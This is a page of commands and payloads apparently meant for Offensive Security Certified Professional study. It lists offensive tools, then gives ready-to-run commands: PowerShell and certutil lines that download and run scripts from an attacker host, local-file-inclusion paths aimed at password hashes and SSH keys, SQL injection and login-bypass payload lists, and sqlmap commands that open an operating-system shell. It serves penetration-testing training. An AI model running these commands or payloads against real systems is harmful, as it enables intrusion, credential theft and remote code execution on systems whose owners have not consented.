OSCP Cheat Sheet
Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
Basics
Name | URL |
---|---|
Swaks | https://github.com/jetmore/swaks |
CyberChef | https://gchq.github.io/CyberChef/ |
Information Gathering
Name | URL |
---|---|
Nmap | https://github.com/nmap/nmap |
pspy | https://github.com/DominicBreuker/pspy |
enum4linux | https://github.com/CiscoCXSecurity/enum4linux |
BloodHound | https://github.com/BloodHoundAD/BloodHound |
BloodHound Python | https://github.com/fox-it/BloodHound.py |
Vulnerability Analysis
Name | URL |
---|---|
Sparta | https://github.com/SECFORCE/sparta |
nikto | https://github.com/sullo/nikto |
Web Application Analysis
Name | URL |
---|---|
PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
ysoserial | https://github.com/frohoff/ysoserial |
JSON Web Tokens | https://jwt.io/ |
httpx | https://github.com/projectdiscovery/httpx |
Gobuster | https://github.com/OJ/gobuster |
ffuf | https://github.com/ffuf/ffuf |
Wfuzz | https://github.com/xmendez/wfuzz |
WPScan | https://github.com/wpscanteam/wpscan |
Database Assessment
Name | URL |
---|---|
NoSQLMap | https://github.com/codingo/NoSQLMap |
sqlmap | https://github.com/sqlmapproject/sqlmap |
Password Attacks
Name | URL |
---|---|
Hydra | https://github.com/vanhauser-thc/thc-hydra |
Patator | https://github.com/lanjelot/patator |
Kerbrute | https://github.com/ropnop/kerbrute |
CrackMapExec | https://github.com/byt3bl33d3r/CrackMapExec |
SprayingToolkit | https://github.com/byt3bl33d3r/SprayingToolkit |
John | https://github.com/openwall/john |
hashcat | https://hashcat.net/hashcat |
LaZagne | https://github.com/AlessandroZ/LaZagne |
mimikatz | https://github.com/gentilkiwi/mimikatz |
pypykatz | https://github.com/skelsec/pypykatz |
RsaCtfTool | https://github.com/Ganapati/RsaCtfTool |
Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |
Reverse Engineering
Exploitation Tools
Name | URL |
---|---|
lsassy | https://github.com/Hackndo/lsassy |
Rubeus | https://github.com/GhostPack/Rubeus |
printspoofer | https://github.com/dievus/printspoofer |
pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit |
Evil-WinRM | https://github.com/Hackplayers/evil-winrm |
Metasploit | https://github.com/rapid7/metasploit-framework |
SharpCollection | https://github.com/Flangvik/SharpCollection |
PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |
Post Exploitation
Name | URL |
---|---|
PEASS-ng | https://github.com/carlospolop/PEASS-ng |
LinEnum | https://github.com/rebootuser/LinEnum |
JAWS | https://github.com/411Hall/JAWS |
Watson | https://github.com/rasta-mouse/Watson |
WESNG | https://github.com/bitsadmin/wesng |
Sherlock | https://github.com/rasta-mouse/Sherlock |
scavenger | https://github.com/SpiderLabs/scavenger |
GTFOBins | https://gtfobins.github.io/ |
LOLBAS | https://lolbas-project.github.io/ |
Impacket | https://github.com/SecureAuthCorp/impacket |
powercat | https://github.com/besimorhino/powercat |
PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |
Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check |
Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation |
Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html |
Priv2Admin | https://github.com/gtworek/Priv2Admin |
CVEs
Exploiting
Name | URL |
---|---|
PwnTools | https://github.com/Gallopsled/pwntools |
checksec | https://github.com/slimm609/checksec.sh |
mona | https://github.com/corelan/mona |
Ropper | https://github.com/sashs/Ropper |
Buffer Overflow | https://github.com/gh0x0st/Buffer_Overflow |
Payloads
Name | URL |
---|---|
PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
Payload Box | https://github.com/payloadbox |
ysoserial | https://github.com/frohoff/ysoserial |
nishang | https://github.com/samratashok/nishang |
Shikata Ga Nai | https://github.com/EgeBalci/sgn |
unicorn | https://github.com/trustedsec/unicorn |
PowerLine | https://github.com/fullmetalcache/powerline |
woodpecker | https://github.com/woodpecker-appstore/log4j-payload-generator |
marshalsec | https://github.com/mbechler/marshalsec |
AMSI.fail | http://amsi.fail |
Raikia’s Hub | https://raikia.com/tool-powershell-encoder/ |
Web-Shells | https://github.com/TheBinitGhimire/Web-Shells |
PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell |
Wordlists
Name | URL |
---|---|
SecLists | https://github.com/danielmiessler/SecLists |
CeWL | https://github.com/digininja/cewl |
CUPP | https://github.com/Mebus/cupp |
COOK | https://github.com/giteshnxtlvl/cook |
Social Media Resources
Name | URL |
---|---|
IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |
IppSec.rocks | https://ippsec.rocks/?# |
0xdf | https://0xdf.gitlab.io/ |
HackTricks | https://book.hacktricks.xyz/ |
Hacking Articles | https://www.hackingarticles.in/ |
Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |
Commands
Basics
CentOS
doas -u <USERNAME> /bin/sh
Certutil
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
Chisel
./chisel server -p 9002 -reverse -v ./chisel client <RHOST>:9002 R:9003:127.0.0.1:8888
gcc
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit i686-w64-mingw32-gcc -o main32.exe main.c x86_64-w64-mingw32-gcc -o main64.exe main.c
Netcat
nc -lnvp <LPORT> < <FILE> nc <RHOST> <RPORT> > <FILE>
PHP Webserver
sudo php -S 127.0.0.1:80
Ping
ping -c 1 <RHOST> ping -n 1 <RHOST>
Python Webserver
sudo python -m SimpleHTTPServer 80 sudo python3 -m http.server 80
RDP
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> +clipboard rdesktop <RHOST>
SSH
ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1 ssh -R 8080:<LHOST>:80 <RHOST> ssh -L 8000:127.0.0.1:8000 <USERNAME>@<RHOST> ssh -N -L 1234:127.0.0.1:1234 <USERNAME>@<RHOST> ssh -L 80:<LHOST>:80 <RHOST> ssh -L 127.0.0.1:80:<LHOST>:80 <RHOST> ssh -L 80:localhost:80 <RHOST>
tmux
ctrl b + w # show windows ctrl + " # split window horizontal ctrl + % # split window vertical ctrl + , # rename window ctrl + { # flip window ctrl + } # flip window ctrl + spacebar # switch pane layout
Copy & Paste
:setw -g mode-keys vi 1. ctrl b + [ 2. space 3. enter 4. ctrl b + ]
Search
ctrl b + [ # enter copy ctrl + / # enter search while within copy mode for vi mode n # search next shift + n # reverse search
Upgrading Shells
python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl + z stty raw -echo fg Enter Enter export XTERM=xterm
vi
:w !sudo tee % # save file with elevated privileges without exiting
Windows Command Formatting
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
Information Gathering
Nmap
sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <RHOST> # discovery scan sudo nmap -A -T4 -sC -sV --script vuln <RHOST> # vulnerability scan sudo nmap -sU <RHOST> # udp scan sudo nmap -sC -sV -p- --scan-delay 5s <RHOST> # delayed scan sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <RHOST> # kerberos enumeration ls -lh /usr/share/nmap/scripts/*ssh* locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb
DNS
Reverse DNS
whois <RHOST> host <RHOST> <RHOST> host -l <RHOST> <RHOST> dig @<RHOST> -x <RHOST> dig {a|txt|ns|mx} <RHOST> dig {a|txt|ns|mx} <RHOST> @ns1.<RHOST> dig axfr @<RHOST> <RHOST> # zone transfer
ldapsearch
ldapsearch -x -w <PASSWORD> ldapsearch -x -h <RHOST> -s base namingcontexts ldapsearch -x -b "dc=<RHOST>,dc=local" "*" -h <RHOST> | awk '/dn: / {print $2}' ldapsearch -x -D "cn=admin,dc=<RHOST>,dc=local" -s sub "cn=*" -h <RHOST> | awk '/uid: /{print $2}' | nl ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com ldapsearch -x -h <RHOST> -D "<USERNAME>" -b "dc=<RHOST>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
sslyze
sslyze --heartbleed <RHOST>
SMB / NetBIOS
nbtscan <RHOST> enum4linux -a <RHOST>
JAWS
IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')
Vulnerability Analysis
finger
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t <RHOST>
Web Application Analysis
Asset Discovery
curl -s -k "https://jldc.me/anubis/subdomains/example.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d'
ffuf
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<RHOST>/backups/backup_2020070416FUZZ.zip
API Fuzzing
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
Looging for LFI
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349
Fuzzing with PHP Session ID
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644
Recursion
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/basic/FUZZ -recursion
File Extensions
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/ext/logs/FUZZ -e .log
No 404 Header
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/no404/FUZZ -fs 669
Param Mining
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/param/data?FUZZ=1
Rate Limiting
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://<RHOST>/cd/rate/FUZZ -mc 200,429
IDOR Testing
seq 1 1000 | ffuf -w - -u http://<RHOST>/cd/pipes/user?id=FUZZ
Script for IDOR Testing
#!/bin/bash while read i do if [ "$1" == "md5" ]; then echo -n $i | md5sum | awk '{ print $1 }' elif [ "$1" == "b64" ]; then echo -n $i | base64 else echo $i fi done
Use Script above for Base64 decoding
seq 1 1000 | /usr/local/bin/hashit b64 | ffuf -w - -u http://<RHOST>/cd/pipes/user2?id=FUZZ
MD5 Discovery using the Script
seq 1 1000 | /usr/local/bin/hashit md5 | ffuf -w - -u http://<RHOST>/cd/pipes/user3?id=FUZZ
Virtual Host Discovery
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -fs 1495
Massive File Extension Discovery
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
Gobuster
-e // extended mode that renders the full url -k // skip ssl certificate validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --wildcard // set wildcard option $ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/ -x php $ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<RHOST>/ -x php,txt,html,js -e -s 200 $ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard
Common File Extensions
txt,bak,php,html,js,asp,aspx
Common Picture Extensions
png,jpg,jpeg,gif,bmp
POST Requests
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200
DNS Recon
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
VHost Discovery
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
Specifiy User Agent
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ -a Linux
Local File Inclusion (LFI)
http://<RHOST>/<FILE>.php?file= http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd
Until php 5.3
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00
Encoded Traversal Strings
../ ..\ ..\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\
Base64 Execution Bypass
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index base64 -d <FILE>.php
Linux Files
/etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow /etc/at.deny /etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny /etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts /etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini /etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/lighttpd.conf /etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release /etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf /etc/network/interfaces /etc/networks /etc/npasswd /etc/passwd /etc/php4.4/fcgi/php.ini /etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini /etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini /etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini /etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf /etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf /etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf /etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf /opt/xampp/etc/php.ini /proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules /proc/mounts /proc/<PID>/cmdline /proc/<PID>/maps /proc/stat /proc/swaps /proc/version /proc/self/net/arp /proc/self/cwd/app.py /proc/sched_debug /proc/net/arp /proc/net/tcp /proc/net/udp /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log /usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf /usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl /var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf /var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log /var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog /var/log/exim/rejectlog /var/log/faillog /var/log/ftplog /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log /var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message /var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log /var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root /var/webmin/miniserv.log /var/www/<vhost>/__init__.py /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log /var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history ~/.bash_history ~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history ~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa ~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc ~/.Xresources ~/.xsession
Windows Files
C:/Users/Administrator/NTUser.dat C:/Documents and Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log C:/Program Files/Apache Group/Apache/logs/error.log C:/Program Files/FileZilla Server/FileZilla Server.xml C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
wfuzz
wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404'
Write to File
wfuzz -w /PATH/TO/WORDLIST -c -f <FILE> -u http://<RHOST> --hc 403,404
Custom Scan with limited Output
wfuzz -w /PATH/TO/WORDLIST -u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
Fuzzing two Parameters at once
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
Domain
wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.<RHOST>.<tld>' -u http://<RHOST>/
Subdomain
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<RHOST>" --hc 200 --hw 356 -t 100 <RHOST>
Git
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://<RHOST>/FUZZ --hc 403,404
Login
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "email=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --hc 200 -c wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "username=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --ss "Invalid login"
SQL
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<RHOST>/select http
DNS
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ.<RHOST>" --filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/ wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -t 100 wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> --hw <value> -t 100
Numbering Files
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip
Enumerating PIDs
wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000
WPScan
wpscan --url https://<RHOST> --disable-tls-checks wpscan --url https://<RHOST> --disable-tls-checks --enumerate u target=<RHOST>; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
Database Analysis
Basic Commands
show databases; use <DATABASE>; show tables; SELECT * FROM *; mysql -u <USERNAME> -h <RHOST> -p
SQL Injection
Master List
admin' or '1'='1 ' or '1'='1 " or "1"="1 " or "1"="1"-- " or "1"="1"/* " or "1"="1"# " or 1=1 " or 1=1 -- " or 1=1 - " or 1=1-- " or 1=1/* " or 1=1# " or 1=1- ") or "1"="1 ") or "1"="1"-- ") or "1"="1"/* ") or "1"="1"# ") or ("1"="1 ") or ("1"="1"-- ") or ("1"="1"/* ") or ("1"="1"# ) or '1`='1-
Authentication Bypass
'-' ' ' '&' '^' '*' ' or 1=1 limit 1 -- -+ '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" "-" " " "&" "^" "*" '--' "--" '--' / "--" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' -- - admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin';-- azer admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
sqlmap
--batch # don't ask any questions --current-db # dumps database sqlmap --list-tampers sqlmap -r <FILE>.reg -p id sqlmap -r <FILE>.reg -p id --dump sqlmap -r <FILE>.reg --level 5 --risk 3 --threads 10 sqlmap -r <FILE>.reg --level 5 --risk 3 --tables sqlmap -r <FILE>.reg --level 5 --risk 3 --tables users --dump --threads 10 sqlmap -r <FILE>.reg -p id --passwords sqlmap -r <FILE>.reg -p id --read-file+/etc/passwd sqlmap -R <FILE>.reg -p id --os-cmd=whoami sqlmap -u 'http://<RHOST>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq" sqlmap -u 'http://<RHOST>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq" --os-shell
sqsh
sqsh -S <RHOST> -U <USERNAME>
SQL Truncation Attack
'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'
xpath Injection
